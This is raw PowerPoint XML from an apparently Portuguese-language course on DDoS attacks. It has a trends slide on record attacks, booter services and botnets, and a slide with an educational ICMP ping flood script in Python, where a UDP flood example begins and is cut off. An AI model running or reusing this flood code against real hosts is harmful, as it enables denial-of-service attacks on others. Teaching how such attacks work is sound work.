            <a:off x="8413412" y="10299502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6/14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7868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Tendências Atuais e Ataques Hipervolumétricos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evolução e sofisticação dos ataques DDoS modernos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4200525" cy="14859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1485900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1" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="1571625"/>
            <a:ext cx="4043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Hipervolumétricos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0050" y="1885950"/>
            <a:ext cx="40433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ataques DDoS têm crescido exponencialmente em volume, ultrapassando a marca de Terabits por segundo (Tbps) e Bilhões de pacotes por segundo (Bpps).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00050" y="2486025"/>
            <a:ext cx="4043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 2024, a Cloudflare mitigou um ataque recorde de 3.8 Tbps, o maior já registrado publicamente.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285750" y="3114675"/>
            <a:ext cx="4200525" cy="19145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00050" y="3228975"/>
            <a:ext cx="4043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Evolução do Volume de Ataques DDoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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486150"/>
            <a:ext cx="3971925" cy="142875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285750" y="5200650"/>
            <a:ext cx="4200525" cy="165735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400050" y="53149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3" y="5407819"/>
            <a:ext cx="192881" cy="1714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64394" y="5314950"/>
            <a:ext cx="285119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Multi-vetoriais</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864394" y="5514975"/>
            <a:ext cx="28511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Combinação de múltiplas técnicas de ataque simultaneamente</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="5757863"/>
            <a:ext cx="3586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atacantes combinam diferentes tipos de ataques DDoS para maximizar o impacto e dificultar a mitigação:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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6215063"/>
            <a:ext cx="50006" cy="10001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64406" y="6186488"/>
            <a:ext cx="168639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Volumétrico (L3/L4) + Aplicação (L7)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788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6415088"/>
            <a:ext cx="50006" cy="10001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64406" y="6386513"/>
            <a:ext cx="1678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Múltiplos protocolos de amplificação</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788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6615113"/>
            <a:ext cx="50006" cy="10001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964406" y="6586538"/>
            <a:ext cx="20452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Ataques pulsantes que alternam intensidade</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="1457325"/>
            <a:ext cx="4200525" cy="1857375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>
            <a:off x="4772025" y="1571625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894" y="1664494"/>
            <a:ext cx="171450" cy="17145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236369" y="1571625"/>
            <a:ext cx="269439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Exploração de Novas Vulnerabilidades</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236369" y="1771650"/>
            <a:ext cx="26943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Busca constante por novos vetores de ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5229225" y="2014538"/>
            <a:ext cx="3586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Os atacantes estão constantemente procurando novas vulnerabilidades e protocolos para explorar:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5229225" y="2414588"/>
            <a:ext cx="3514725" cy="7715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950" y="2518172"/>
            <a:ext cx="100013" cy="100013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5472113" y="2514600"/>
            <a:ext cx="90519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recente:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5314950" y="2514600"/>
            <a:ext cx="3209944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Vulnerabilidade crítica (CVE 9.8) em roteadores ASUS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Text 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5314950" y="2814638"/>
            <a:ext cx="34147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Explorada para criar uma botnet massiva que gerou ataques de 3.8 Tbps em 2024</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="3414713"/>
            <a:ext cx="4200525" cy="1343025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41" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="3529013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178" y="3621881"/>
            <a:ext cx="192881" cy="17145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5236369" y="3529013"/>
            <a:ext cx="16613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DDoS como Serviço</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Text 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236369" y="3729038"/>
            <a:ext cx="16613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Democratização dos ataques DDoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Text 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5229225" y="3971925"/>
            <a:ext cx="3586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Serviços de "booter" ou "stresser" permitem que indivíduos sem conhecimento técnico aluguem botnets para realizar ataques:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5229225" y="4371975"/>
            <a:ext cx="1714500" cy="2571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47" name="Text 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="4443413"/>
            <a:ext cx="38272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Preço:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Text 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5597658" y="4443413"/>
            <a:ext cx="111674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partir de $10-50/hora</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Shape 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7029450" y="4371975"/>
            <a:ext cx="1714500" cy="25717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50" name="Text 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="4443413"/>
            <a:ext cx="66615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Capacidade:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Text 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7681317" y="4443413"/>
            <a:ext cx="67748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50-500 Gbps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Shape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="4857750"/>
            <a:ext cx="4200525" cy="1571625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53" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="4972050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894" y="5064919"/>
            <a:ext cx="171450" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Text 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236369" y="4972050"/>
            <a:ext cx="18180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Uso de IA/ML em Ataques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Text 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236369" y="5172075"/>
            <a:ext cx="18180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Automação e otimização de ataques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Text 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5229225" y="5414963"/>
            <a:ext cx="3586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Inteligência Artificial e Machine Learning estão sendo incorporados em ataques DDoS:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5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9225" y="5843588"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5336381" y="5815013"/>
            <a:ext cx="20561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Otimização automática de vetores de ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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9225" y="6015038"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Text 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5336381" y="5986463"/>
            <a:ext cx="21840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Geração de tráfego que imita padrões legítimos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody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9225" y="6186488"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Text 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5336381" y="6157913"/>
            <a:ext cx="22230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Adaptação em tempo real às medidas de defesa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Shape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="6529388"/>
            <a:ext cx="4200525" cy="1600200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65" name="Shape 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="6643688"/>
            <a:ext cx="357188" cy="357188"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA5">
              <a:alpha val="30000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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4894" y="6736556"/>
            <a:ext cx="171450" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Text 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236369" y="6643688"/>
            <a:ext cx="173367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Setores mais Visados</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Text 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236369" y="6843713"/>
            <a:ext cx="173367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Alvos preferenciais de ataques DDoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Shape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5229225" y="7086600"/>
            <a:ext cx="1133456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7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8803" y="7168753"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Text 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="7315200"/>
            <a:ext cx="10905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Financeiro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Shape 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6419831" y="7086600"/>
            <a:ext cx="1133484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7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15122" y="7168753"/>
            <a:ext cx="142875" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Text 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6476981" y="7315200"/>
            <a:ext cx="10906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Gaming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Shape 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7610466" y="7086600"/>
            <a:ext cx="1133484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7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7188" y="7168753"/>
            <a:ext cx="100013" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Text 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667616" y="7315200"/>
            <a:ext cx="10906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E-commerce</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Shape 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5229225" y="7572375"/>
            <a:ext cx="1133456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7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8803" y="7654528"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Text 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="7800975"/>
            <a:ext cx="10905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Governo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Shape 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6419831" y="7572375"/>
            <a:ext cx="1133484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8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9410" y="7654528"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Text 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6476981" y="7800975"/>
            <a:ext cx="10906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ISPs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Shape 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7610466" y="7572375"/>
            <a:ext cx="1133484" cy="4286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pic>
        <p:nvPicPr>
          <p:cNvPr id="8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5756" y="7654528"/>
            <a:ext cx="142875" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Text 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7667616" y="7800975"/>
            <a:ext cx="10906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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Shape 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="840105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88" name="Text 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="848677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89" name="Text 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8413412" y="848677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7/14</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7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3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Prático: Ataque DoS Simples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Demonstração educacional de código para fins de compreensão técnica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685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DC2626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685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DC2626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71450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28650" y="1543050"/>
            <a:ext cx="8215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8717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AVISO IMPORTANTE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628650" y="1735931"/>
            <a:ext cx="1297763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Este código é fornecido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1854975" y="1735931"/>
            <a:ext cx="54778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APENAS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2331318" y="1735931"/>
            <a:ext cx="6240568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 fins educacionais e de compreensão técnica. A execução destes scripts contra sistemas sem autorização explícita é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28650" y="1907381"/>
            <a:ext cx="4905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ILEGAL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1047731" y="1907381"/>
            <a:ext cx="3432572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 antiética. Use apenas em ambientes de laboratório controlados.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285750" y="2257425"/>
            <a:ext cx="4357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1: ICMP Flood (Ping Flood)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="2571750"/>
            <a:ext cx="4286250" cy="24431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285750" y="2571750"/>
            <a:ext cx="4286250" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA5">
              <a:alpha val="3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371475" y="2628900"/>
            <a:ext cx="151185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ping_flood_example.py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3971841" y="2657475"/>
            <a:ext cx="58587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Python 3.x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371475" y="2957513"/>
            <a:ext cx="4572753" cy="12830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#!/usr/bin/env python3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Exemplo educacional de um ataque ICMP Flood (Ping Flood)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APENAS PARA FINS EDUCACIONAIS - NÃO USE EM SISTEMAS REAIS SEM AUTORIZAÇÃO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"""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socket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random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sys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time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from struct import pack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checksum(data):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"""Calcula o checksum ICMP"""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s = 0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n = len(data)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for i in range(0, n, 2):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if i + 1 &lt; n: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 += (data[i] + (data[i+1] &lt;&lt; 8))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elif i &lt; n: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 += data[i]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s = (s &gt;&gt; 16) + (s &amp; 0xffff)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s += s &gt;&gt; 16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s = ~s &amp; 0xffff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return s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ping_flood(target_ip, count=1000):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Demonstração de um ataque Ping Flood simples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print(f"[*] Iniciando demonstração de Ping Flood para {target_ip}")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print("[*] Pressione Ctrl+C para interromper")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Cria um socket raw (requer privilégios de root/admin)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sock = socket.socket(socket.AF_INET, socket.SOCK_RAW,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        socket.IPPROTO_ICMP)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Define o timeout do socket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sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVTIMEO,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   pack('ll', 1, 0))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sent = 0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for i in range(count):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Cria um pacote ICMP Echo Request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icmp_type = 8  # Echo Request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icmp_code = 0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icmp_checksum = 0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icmp_id = random.randint(1, 65535)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icmp_seq = i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Cabeçalho ICMP (8 bytes) + dados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payload = b'A' * 56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icmp_header = pack('!BBHHH', icmp_type, icmp_code,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          icmp_checksum, icmp_id, icmp_seq)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Calcula o checksum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icmp_checksum = checksum(icmp_header + payload)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Recria o cabeçalho com o checksum correto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icmp_header = pack('!BBHHH', icmp_type, icmp_code,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          socket.htons(icmp_checksum),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          icmp_id, icmp_seq)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Pacote completo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packet = icmp_header + payload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Envia o pacote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sock.sendto(packet, (target_ip, 0))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sent += 1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Status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if sent % 100 == 0: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print(f"[+] Enviados {sent} pacotes ICMP")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Pequena pausa para não sobrecarregar o sistema local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time.sleep(0.01)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KeyboardInterrupt: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print("\n[*] Demonstração interrompida pelo usuário")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Exception as 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print(f"[!] Erro: {e}")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finally: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print(f"[*] Total de pacotes enviados: {sent}")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sock.close()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if __name__ == "__main__":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if len(sys.argv) != 2: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print(f"Uso: {sys.argv[0]}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371475" y="15673388"/>
            <a:ext cx="4512729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print("Exemplo: sudo python3 ping_flood_example.py 192.168.1.100")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sys.exit(1)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# Requer privilégios de root/admin para criar socket raw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if os.geteuid() != 0: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print("[!] Este script requer privilégios de root/admin")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    Execute: sudo python3 {sys.argv[0]}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371475" y="16673513"/>
            <a:ext cx="35524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sys.exit(1)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target = sys.argv[1]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ping_flood(target)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="5114925"/>
            <a:ext cx="4286250" cy="100012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285750" y="5114925"/>
            <a:ext cx="28575" cy="100012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28" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371475" y="5200650"/>
            <a:ext cx="4186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Características do ICMP Flood:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody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5389959"/>
            <a:ext cx="50006" cy="100013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478631" y="5386388"/>
            <a:ext cx="231694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 sockets raw para construir pacotes IP/ICMP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3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5561409"/>
            <a:ext cx="50006" cy="100013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478631" y="5557838"/>
            <a:ext cx="232852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Requer privilégios de administrador para execução</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody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5732859"/>
            <a:ext cx="50006" cy="100013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78631" y="5729288"/>
            <a:ext cx="179274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Calcula checksum ICMP manualmente</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788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5904309"/>
            <a:ext cx="50006" cy="100013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478631" y="5900738"/>
            <a:ext cx="250095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pacotes Echo Request (ping) em alta velocidade</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743450" y="2257425"/>
            <a:ext cx="43576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2: UDP Flood</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743450" y="2571750"/>
            <a:ext cx="4286250" cy="24431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39" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743450" y="2571750"/>
            <a:ext cx="4286250" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA5">
              <a:alpha val="30000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Text 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829175" y="2628900"/>
            <a:ext cx="14432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udp_flood_example.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
